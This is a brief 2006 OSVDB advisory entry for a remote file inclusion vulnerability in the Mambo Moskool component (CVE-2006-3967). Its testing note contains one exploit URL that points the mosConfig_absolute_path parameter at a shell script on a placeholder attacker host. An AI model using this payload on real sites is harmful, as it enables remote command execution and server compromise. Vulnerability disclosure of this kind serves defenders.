MamboXChange Moskool admin.moskool.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-30T17:23:15
ID OSVDB:29073
Type osvdb
Reporter OSVDB
Modified 2006-07-30T17:23:15

Description

Manual Testing Notes

http://[target]/component/option,com_moskool/Itemid,34/admin.moskool.php?mosConfig_absolute_path?=http://[attacker]/shell.txt?cmd

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0548.html CVE-2006-3967 Bugtraq ID: 19245